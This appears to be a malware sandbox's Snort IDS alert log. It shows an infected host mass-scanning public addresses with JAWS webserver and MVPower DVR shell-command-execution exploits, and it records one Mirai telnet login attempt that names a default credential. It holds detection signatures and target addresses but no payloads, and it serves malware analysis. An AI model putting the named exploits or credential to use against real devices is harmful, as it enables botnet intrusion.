      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39084 -> 149.28.97.40:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42816 -> 12.10.87.14:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.35.171.209:80 -> 192.168.2.23:60880
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60880 -> 23.35.171.209:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54002 -> 177.73.249.151:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49168 -> 104.252.39.254:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35600 -> 174.90.249.169:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42370 -> 134.236.179.23:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54002 -> 177.73.249.151:80
      Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:59440
      Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:59440
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48826 -> 54.37.85.207:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42230 -> 80.77.145.22:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43612 -> 54.88.8.84:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59578 -> 157.241.1.175:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52100 -> 154.216.126.109:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54654 -> 47.74.84.26:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59578 -> 157.241.1.175:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51944 -> 168.76.47.94:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47128 -> 68.232.45.241:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54654 -> 47.74.84.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42292 -> 184.24.225.229:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55074 -> 42.29.36.152:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34624 -> 142.250.27.165:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47756 -> 91.212.215.53:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.24.225.229:80 -> 192.168.2.23:42292
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42292 -> 184.24.225.229:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58520 -> 216.183.156.185:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59772 -> 103.27.177.191:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58002 -> 23.8.48.163:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.48.163:80 -> 192.168.2.23:58002
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36636 -> 104.19.237.238:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49624 -> 94.130.226.99:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36636 -> 104.19.237.238:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57460 -> 23.250.0.235:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46060 -> 178.90.147.37:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42834 -> 54.85.156.204:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46060 -> 178.90.147.37:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54394 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42834 -> 54.85.156.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33046 -> 23.48.236.56:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38802 -> 49.212.164.218:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56350 -> 103.117.180.83:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.48.236.56:80 -> 192.168.2.23:33046
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55134 -> 142.93.99.116:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38578 -> 34.110.141.231:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43838 -> 23.205.245.192:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.205.245.192:80 -> 192.168.2.23:43838
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43838 -> 23.205.245.192:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48508 -> 193.238.246.54:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49668 -> 213.151.56.65:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55394 -> 72.12.132.6:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34118 -> 151.121.77.147:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49668 -> 213.151.56.65:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44254 -> 45.60.152.154:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58596 -> 52.220.240.243:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33696 -> 23.222.154.108:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48608 -> 184.171.102.54:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36784 -> 23.220.75.159:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55394 -> 72.12.132.6:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44254 -> 45.60.152.154:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.222.154.108:80 -> 192.168.2.23:33696
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33696 -> 23.222.154.108:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54472 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.220.75.159:80 -> 192.168.2.23:36784
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36784 -> 23.220.75.159:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54472 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41770 -> 192.142.100.20:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42252 -> 92.242.186.78:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37764 -> 40.122.33.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54528 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47080 -> 206.116.44.156:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39984 -> 66.228.47.134:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41770 -> 192.142.100.20:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46230 -> 23.208.207.82:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45074 -> 160.124.26.205:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33422 -> 205.175.227.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54278 -> 18.206.159.108:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39792 -> 46.28.206.124:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34576 -> 104.89.17.210:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39792 -> 46.28.206.124:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42916 -> 18.184.21.21:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47762 -> 18.194.150.40:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54528 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42934 -> 94.23.20.205:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35862 -> 179.60.195.130:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52806 -> 167.172.190.47:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42916 -> 18.184.21.21:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35862 -> 179.60.195.130:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52806 -> 167.172.190.47:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55750 -> 104.252.211.10:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43656 -> 154.95.153.146:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36966 -> 104.125.240.251:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33422 -> 205.175.227.236:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.207.82:80 -> 192.168.2.23:46230
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46230 -> 23.208.207.82:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43656 -> 154.95.153.146:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.125.240.251:80 -> 192.168.2.23:36966
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36966 -> 104.125.240.251:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51830 -> 210.48.246.67:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59700 -> 180.215.79.230:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51830 -> 210.48.246.67:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59144 -> 94.130.26.20:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48516 -> 52.85.70.101:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46134 -> 35.156.202.36:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59144 -> 94.130.26.20:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60736 -> 52.210.232.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49026 -> 178.170.65.117:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46134 -> 35.156.202.36:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48516 -> 52.85.70.101:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60736 -> 52.210.232.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35020 -> 151.101.146.114:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54668 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43422 -> 104.107.104.6:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49868 -> 83.169.22.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57884 -> 23.5.221.89:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55486 -> 184.28.241.171:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49868 -> 83.169.22.199:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.5.221.89:80 -> 192.168.2.23:57884
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57884 -> 23.5.221.89:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44460 -> 79.185.171.228:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52952 -> 95.100.242.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36620 -> 34.197.9.37:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.242.137:80 -> 192.168.2.23:52952
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51186 -> 198.78.104.211:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44460 -> 79.185.171.228:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54668 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.107.104.6:80 -> 192.168.2.23:43422
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43422 -> 104.107.104.6:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33692 -> 162.251.158.223:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37334 -> 23.108.233.247:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34654 -> 23.66.233.127:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53974 -> 47.56.83.196:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56838 -> 23.9.243.61:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43426 -> 188.166.98.116:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56062 -> 85.30.233.225:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38698 -> 172.104.26.93:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37598 -> 35.196.156.3:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.9.243.61:80 -> 192.168.2.23:56838
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34706 -> 23.66.233.127:80
      Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:59868
      Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:59868
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39566 -> 94.237.124.65:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55214 -> 199.232.199.142:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37842 -> 13.49.113.2:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43214 -> 185.37.232.211:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57678 -> 184.86.185.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57048 -> 75.101.185.156:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.185.99:80 -> 192.168.2.23:57678
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57678 -> 184.86.185.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39182 -> 18.194.167.246:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51476 -> 136.243.23.184:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52686 -> 46.229.200.41:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52686 -> 46.229.200.41:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48816 -> 45.32.61.41:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55044 -> 107.160.93.51:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39244 -> 23.73.100.21:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46078 -> 61.63.0.22:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48816 -> 45.32.61.41:80
      Source: TrafficSnort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.23:34544 -> 43.252.199.80:23
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51730 -> 122.218.37.218:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.73.100.21:80 -> 192.168.2.23:39244
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39244 -> 23.73.100.21:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46078 -> 61.63.0.22:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57048 -> 75.101.185.156:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36490 -> 167.82.99.43:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55610 -> 192.206.45.102:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38546 -> 54.246.188.96:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42998 -> 46.43.80.79:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38546 -> 54.246.188.96:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57466 -> 134.122.120.121:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60762 -> 23.216.131.40:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42998 -> 46.43.80.79:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.216.131.40:80 -> 192.168.2.23:60762
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58412 -> 187.133.18.96:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48438 -> 104.215.0.165:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43214 -> 54.180.5.63:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43214 -> 54.180.5.63:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40164 -> 23.53.226.173:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41222 -> 197.246.247.65:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.226.173:80 -> 192.168.2.23:40164
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42050 -> 172.65.116.226:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42050 -> 172.65.116.226:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59758 -> 77.118.100.88:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41222 -> 197.246.247.65:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59758 -> 77.118.100.88:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54380 -> 51.81.28.235:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60268 -> 23.219.107.249:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48932 -> 71.16.207.248:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40482 -> 23.48.72.134:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.107.249:80 -> 192.168.2.23:60268
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.48.72.134:80 -> 192.168.2.23:40482
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45212 -> 201.24.30.14:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45450 -> 217.182.32.179:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34700 -> 195.18.19.136:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34700 -> 195.18.19.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41808 -> 73.230.21.135:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43724 -> 209.235.131.241:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54978 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37660 -> 104.109.96.222:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51048 -> 65.196.116.154:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56360 -> 52.219.136.103:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41808 -> 73.230.21.135:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51692 -> 202.95.11.207:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44180 -> 104.164.97.112:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.109.96.222:80 -> 192.168.2.23:37660
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54978 -> 107.15.250.189:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43724 -> 209.235.131.241:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58092 -> 13.32.17.215:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40390 -> 156.234.240.108:80
